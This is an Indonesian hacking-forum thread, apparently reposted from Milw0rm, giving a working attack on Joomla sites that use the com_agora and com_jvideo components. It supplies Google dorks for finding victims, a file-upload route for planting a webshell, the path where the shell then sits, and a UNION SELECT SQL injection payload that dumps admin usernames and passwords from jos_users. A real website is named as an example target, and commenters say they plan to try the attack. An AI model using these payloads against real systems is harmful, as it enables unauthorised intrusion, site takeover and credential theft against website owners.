Joomla Component Vuln

[N4ck0]

Courtesy Milw0rm.com

Just Share vuln On joomla CMS

I

1. Find viktim om google,

dgn dork
inurl:option=com_agora


2.setelah dapet viktimnya, loe masukan exploitnya :


index.php?option=com_agora&task=upload

misalnya :
http://40kwarzone.com/index.php?option= ... ask=upload

3.Browse webshell yg kita punya
4.Kalau sukses ganti urlnya jadi gini


components/com_agora/img/members/0/

misalnya :
http://40kwarzone.com/components/com_ag ... members/0/ [shell yg kita upload ]

II

type in google with dork :

inurl:option=com_jvideo or
inurl:com_jvideo

masukin exploitnya

index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users

semoga bermanfaat

[anja_indie]

to semua wweb yg pk joomla kan???
jajal ah.........

[vodork]

emm...
besok coba ah...

[taurnil]

cuma bisa di joomla yang pke component agora shop ama component jvideo kan y bro y? CMIIW

[N4ck0]

to semua wweb yg pk joomla kan???
jajal ah.........

iya itu buat web berbasis joomla

emm...
besok coba ah...

silahkan kk

cuma bisa di joomla yang pke component agora shop ama component jvideo kan y bro y? CMIIW

iya mang tuh componentnya joomla kk

[andi90]

kk itu buat apa sih?
maklumlah saia cupu

[N4ck0]

kk itu buat apa sih?
maklumlah saia cupu

itu kelemahan yg ada di web berbasis joomla
klo kita dapat mengetahui user N pass adminnya

[andi90]

kk itu buat apa sih?
maklumlah saia cupu

itu kelemahan yg ada di web berbasis joomla
klo kita dapat mengetahui user N pass adminnya

termasuk masuk ke joomla administration itu webnya yah?

[N4ck0]

kk itu buat apa sih?
maklumlah saia cupu

itu kelemahan yg ada di web berbasis joomla
klo kita dapat mengetahui user N pass adminnya

termasuk masuk ke joomla administration itu webnya yah?

iya kk
mang itu buat jadi adminnya
ada juga yang langsung upload shell kita

[ji_bog]

wew keren neh
thanks for share bro